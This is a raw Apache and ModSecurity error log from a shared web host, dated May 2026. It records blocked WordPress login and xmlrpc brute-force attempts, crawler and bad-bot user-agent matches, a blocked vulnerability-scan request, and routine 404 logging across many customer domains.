[Tue May 26 16:14:45.944050 2026] [security2:error] [pid 782634:tid 782847] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5nf_P9qBfeb1w76ZE0AAAAFM"]
[Tue May 26 16:14:48.247386 2026] [autoindex:error] [pid 782634:tid 782848] [client 198.235.24.124:59446] AH01276: Cannot serve directory /home2/svijakqj/masonicarkfoundation.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:14:48.479728 2026] [security2:error] [pid 782634:tid 782766] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5oP_P9qBfeb1w76ZFCAAAAAI"]
[Tue May 26 16:14:49.901962 2026] [security2:error] [pid 782634:tid 782802] [client 103.44.52.196:50482] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV5of_P9qBfeb1w76ZFOgAAACY"]
[Tue May 26 16:14:49.902053 2026] [security2:error] [pid 782634:tid 782802] [client 103.44.52.196:50482] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV5of_P9qBfeb1w76ZFOgAAACY"]
[Tue May 26 16:14:49.912284 2026] [security2:error] [pid 782634:tid 782865] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5of_P9qBfeb1w76ZFMQAAAGU"]
[Tue May 26 16:14:51.559799 2026] [security2:error] [pid 782634:tid 782858] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5o__P9qBfeb1w76ZFUQAAAF4"]
[Tue May 26 16:14:51.889185 2026] [security2:error] [pid 782634:tid 782804] [client 106.219.85.83:7493] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV5o__P9qBfeb1w76ZFagAAACg"]
[Tue May 26 16:14:51.889294 2026] [security2:error] [pid 782634:tid 782804] [client 106.219.85.83:7493] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV5o__P9qBfeb1w76ZFagAAACg"]
[Tue May 26 16:14:53.581835 2026] [security2:error] [pid 782634:tid 782842] [client 202.36.122.215:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahV5pf_P9qBfeb1w76ZFjQAAAE4"]
[Tue May 26 16:14:54.126043 2026] [security2:error] [pid 782634:tid 782812] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5pf_P9qBfeb1w76ZFlgAAADA"]
[Tue May 26 16:14:54.626897 2026] [security2:error] [pid 782634:tid 782830] [client 64.89.161.160:63031] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 160.161.89.64.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usteve.com"] [uri "/assets/admin/plugins/elfinder/connectors/php/connector.php"] [unique_id "ahV5pv_P9qBfeb1w76ZFqQAAAEI"]
[Tue May 26 16:14:56.234563 2026] [security2:error] [pid 782634:tid 782879] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5p__P9qBfeb1w76ZFvwAAAHM"]
[Tue May 26 16:14:56.669111 2026] [security2:error] [pid 782634:tid 782836] [client 202.36.122.215:61729] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.bloggertarget.com"] [uri "/"] [unique_id "ahV5pf_P9qBfeb1w76ZFiwAAAAo"]
[Tue May 26 16:14:57.782106 2026] [security2:error] [pid 782634:tid 782827] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5qf_P9qBfeb1w76ZF2wAAAD8"]
[Tue May 26 16:14:58.531764 2026] [security2:error] [pid 782634:tid 782873] [client 202.36.122.215:61827] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahV5qv_P9qBfeb1w76ZF8gAAAG0"]
[Tue May 26 16:14:58.654193 2026] [security2:error] [pid 782634:tid 782873] [client 202.36.122.215:61827] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "200"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahV5qv_P9qBfeb1w76ZF8gAAAG0"]
[Tue May 26 16:14:58.654238 2026] [security2:error] [pid 782634:tid 782873] [client 202.36.122.215:61827] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahV5qv_P9qBfeb1w76ZF8gAAAG0"]
[Tue May 26 16:14:58.816875 2026] [security2:error] [pid 782634:tid 782791] [client 114.119.154.87:49019] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "chettinadavenue.com"] [uri "/robots.txt"] [unique_id "ahV5qv_P9qBfeb1w76ZGCQAAABs"]
[Tue May 26 16:15:00.327118 2026] [security2:error] [pid 782634:tid 782854] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5q__P9qBfeb1w76ZGKQAAAFo"]
[Tue May 26 16:15:00.606837 2026] [security2:error] [pid 782634:tid 782792] [client 103.44.52.196:32778] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV5rP_P9qBfeb1w76ZGPQAAABw"]
[Tue May 26 16:15:00.606985 2026] [security2:error] [pid 782634:tid 782792] [client 103.44.52.196:32778] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV5rP_P9qBfeb1w76ZGPQAAABw"]
[Tue May 26 16:15:01.752959 2026] [security2:error] [pid 782634:tid 782645] [remote 103.95.119.103:57012] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-login.php"] [unique_id "ahV5rf_P9qBfeb1w76ZGaQAANAo"]
[Tue May 26 16:15:01.792311 2026] [security2:error] [pid 782634:tid 782772] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5rf_P9qBfeb1w76ZGZAAAAAg"]
[Tue May 26 16:15:01.999344 2026] [security2:error] [pid 782634:tid 782847] [client 172.98.32.40:23995] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 40.32.98.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahV5rf_P9qBfeb1w76ZGagAAAFM"]
[Tue May 26 16:15:02.506559 2026] [security2:error] [pid 782634:tid 782870] [client 106.219.85.83:23357] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV5rv_P9qBfeb1w76ZGhwAAAGo"]
[Tue May 26 16:15:02.506707 2026] [security2:error] [pid 782634:tid 782870] [client 106.219.85.83:23357] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV5rv_P9qBfeb1w76ZGhwAAAGo"]
[Tue May 26 16:15:03.499083 2026] [security2:error] [pid 782634:tid 782661] [remote 211.23.68.235:1342] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.68.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahV5r__P9qBfeb1w76ZGlQAAdBo"]
[Tue May 26 16:15:04.386372 2026] [security2:error] [pid 782634:tid 782833] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5r__P9qBfeb1w76ZGpwAAAEU"]
[Tue May 26 16:15:05.744764 2026] [security2:error] [pid 782634:tid 782890] [client 136.0.207.115:0] ModSecurity: Warning. Matched phrase "Exabot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "bloggertarget.com"] [uri "/robots.txt"] [unique_id "ahV5sf_P9qBfeb1w76ZG0QAAAH4"]
[Tue May 26 16:15:05.745454 2026] [security2:error] [pid 782634:tid 782775] [client 136.0.207.115:56269] ModSecurity: Warning. Matched phrase "Exabot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "bloggertarget.com"] [uri "/robots.txt"] [unique_id "ahV5sf_P9qBfeb1w76ZGzwAAAAs"]
[Tue May 26 16:15:06.469924 2026] [security2:error] [pid 782634:tid 782872] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5sv_P9qBfeb1w76ZG2gAAAGw"]
[Tue May 26 16:15:08.561100 2026] [security2:error] [pid 782634:tid 782870] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5tP_P9qBfeb1w76ZHAgAAAGo"]
[Tue May 26 16:15:10.514370 2026] [security2:error] [pid 782634:tid 782878] [client 114.119.133.194:46473] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahV5tv_P9qBfeb1w76ZHMwAAAHI"], referer: http://haddingtonwines.com/cart?remove_item=665d5cbb82b5785d9f344c46417c6c36
[Tue May 26 16:15:10.583963 2026] [security2:error] [pid 782634:tid 782832] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5tv_P9qBfeb1w76ZHKAAAAEQ"]
[Tue May 26 16:15:11.100475 2026] [security2:error] [pid 782634:tid 782765] [client 103.44.52.196:52904] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV5tv_P9qBfeb1w76ZHRAAAAAE"]
[Tue May 26 16:15:11.100608 2026] [security2:error] [pid 782634:tid 782765] [client 103.44.52.196:52904] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV5tv_P9qBfeb1w76ZHRAAAAAE"]
[Tue May 26 16:15:12.586421 2026] [security2:error] [pid 782634:tid 782833] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5uP_P9qBfeb1w76ZHWgAAAEU"]
[Tue May 26 16:15:12.981040 2026] [security2:error] [pid 782634:tid 782849] [client 102.251.68.23:33597] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahV5uP_P9qBfeb1w76ZHaQAAAFU"]
[Tue May 26 16:15:13.286547 2026] [autoindex:error] [pid 782634:tid 782870] [client 198.235.24.199:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/test/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:15:13.296135 2026] [security2:error] [pid 782634:tid 782888] [client 106.219.85.83:6582] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV5uf_P9qBfeb1w76ZHdAAAAHw"]
[Tue May 26 16:15:13.296235 2026] [security2:error] [pid 782634:tid 782888] [client 106.219.85.83:6582] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV5uf_P9qBfeb1w76ZHdAAAAHw"]
[Tue May 26 16:15:14.085561 2026] [security2:error] [pid 782634:tid 782817] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5uf_P9qBfeb1w76ZHjAAAADU"]
[Tue May 26 16:15:15.133308 2026] [security2:error] [pid 782634:tid 782846] [client 141.148.18.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahV5u__P9qBfeb1w76ZHqgAAAFI"]
[Tue May 26 16:15:15.879861 2026] [security2:error] [pid 782634:tid 782845] [client 141.148.18.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahV5u__P9qBfeb1w76ZHyAAAAFE"]
[Tue May 26 16:15:16.243982 2026] [security2:error] [pid 782634:tid 782817] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5u__P9qBfeb1w76ZHxQAAADU"]
[Tue May 26 16:15:18.614558 2026] [security2:error] [pid 782634:tid 782807] [client 176.36.146.80:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV5vv_P9qBfeb1w76ZIDwAAACs"], referer: https://www.anujtradingco.com/
[Tue May 26 16:15:18.909909 2026] [security2:error] [pid 782634:tid 782837] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5vv_P9qBfeb1w76ZIDAAAAEk"]
[Tue May 26 16:15:19.601600 2026] [security2:error] [pid 782634:tid 782720] [remote 14.161.17.36:54632] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.17.161.14.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahV5v__P9qBfeb1w76ZIHAAACFU"]
[Tue May 26 16:15:19.711226 2026] [security2:error] [pid 782634:tid 782851] [client 176.36.146.80:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV5v__P9qBfeb1w76ZIIwAAAFc"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1418301&moderation-hash=e2b93e50d494482663d0532dbbc6aefc
[Tue May 26 16:15:20.305378 2026] [security2:error] [pid 782634:tid 782806] [client 102.252.68.10:5195] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahV5v__P9qBfeb1w76ZIJAAAACo"]
[Tue May 26 16:15:20.865380 2026] [security2:error] [pid 782634:tid 782782] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5wP_P9qBfeb1w76ZIQgAAABI"]
[Tue May 26 16:15:21.413269 2026] [security2:error] [pid 782634:tid 782828] [client 103.44.52.196:34346] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV5wf_P9qBfeb1w76ZIYgAAAEA"]
[Tue May 26 16:15:21.413403 2026] [security2:error] [pid 782634:tid 782828] [client 103.44.52.196:34346] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV5wf_P9qBfeb1w76ZIYgAAAEA"]
[Tue May 26 16:15:22.443001 2026] [security2:error] [pid 782634:tid 782850] [client 85.208.96.207:50034] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-16-20/list/"] [unique_id "ahV5wv_P9qBfeb1w76ZIiQAAAFY"]
[Tue May 26 16:15:22.443173 2026] [security2:error] [pid 782634:tid 782850] [client 85.208.96.207:50034] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-16-20/list/"] [unique_id "ahV5wv_P9qBfeb1w76ZIiQAAAFY"]
[Tue May 26 16:15:22.842131 2026] [security2:error] [pid 782634:tid 782874] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5wv_P9qBfeb1w76ZIiAAAAG4"]
[Tue May 26 16:15:23.438754 2026] [security2:error] [pid 782634:tid 782866] [client 74.7.244.23:52940] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "knightmasonsssea.org.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahV5w__P9qBfeb1w76ZIpgAAZgk"]
[Tue May 26 16:15:23.658288 2026] [security2:error] [pid 782634:tid 782872] [client 106.219.85.83:27469] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV5w__P9qBfeb1w76ZIqAAAAGw"]
[Tue May 26 16:15:23.658618 2026] [security2:error] [pid 782634:tid 782872] [client 106.219.85.83:27469] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV5w__P9qBfeb1w76ZIqAAAAGw"]
[Tue May 26 16:15:24.568508 2026] [security2:error] [pid 782634:tid 782865] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5xP_P9qBfeb1w76ZIuwAAAGU"]
[Tue May 26 16:15:26.420899 2026] [security2:error] [pid 782634:tid 782802] [client 176.36.146.80:63219] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 80.146.36.176.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahV5xv_P9qBfeb1w76ZI6gAAACY"], referer: https://anujtradingco.com
[Tue May 26 16:15:26.592573 2026] [security2:error] [pid 782634:tid 782828] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5xv_P9qBfeb1w76ZI6QAAAEA"]
[Tue May 26 16:15:27.150809 2026] [security2:error] [pid 782634:tid 782803] [client 176.36.146.80:63381] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "176.36.146.80" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahV5x__P9qBfeb1w76ZI_gAAACc"], referer: https://anujtradingco.com
